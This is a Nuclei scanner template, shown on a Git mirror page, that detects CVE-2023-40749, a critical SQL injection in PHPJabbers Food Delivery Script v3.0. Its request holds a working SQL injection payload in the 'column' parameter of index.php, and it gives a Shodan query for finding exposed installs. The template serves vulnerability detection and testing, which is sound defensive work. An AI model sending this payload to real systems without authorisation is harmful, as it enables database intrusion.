daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2023/CVE-2023-40749.yaml

43 lines
1.5 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

id: CVE-2023-40749
info:
name: PHPJabbers Food Delivery Script v3.0 - SQL Injection
author: ritikchaddha
severity: critical
description: |
PHPJabbers Food Delivery Script v3.0 is vulnerable to SQL Injection in the "column" parameter of index.php.
reference:
- https://medium.com/@tfortinsec/multiple-vulnerabilities-in-phpjabbers-part-3-40fc3565982f
- https://nvd.nist.gov/vuln/detail/CVE-2023-40749
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-40749
cwe-id: CWE-89
cpe: cpe:2.3:a:phpjabbers:food_delivery_script:3.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: html:"PHPJabbers"
vendor: phpjabbers
product: food_delivery_script
tags: cve,cve2023,phpjabbers,food-delivery,sqli
http:
- method: POST
path:
- "{{BaseURL}}/index.php?controller=pjAdminOrders%26action%3dpjActionGetNewOrder%26column%3d(SELECT+(CASE+WHEN+(4213%3d4213)+THEN+0x63726561746564+ELSE+(SELECT+7877+UNION+SELECT+7153)+END))%26direction%3dASC%26page%3d1%26rowCount%3d50%26q%3d%26type%3d"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "class <strong>pjAdminOrdersaction"
- "didn't exists"
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450220169b25e65473dce9e40a186e2c6f5369ece53dd627d3dbd533192f7bdc25495a022100bb08a3f5946009bfbe428055fb7e260e22b5755991462b2a350315250fc20604:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink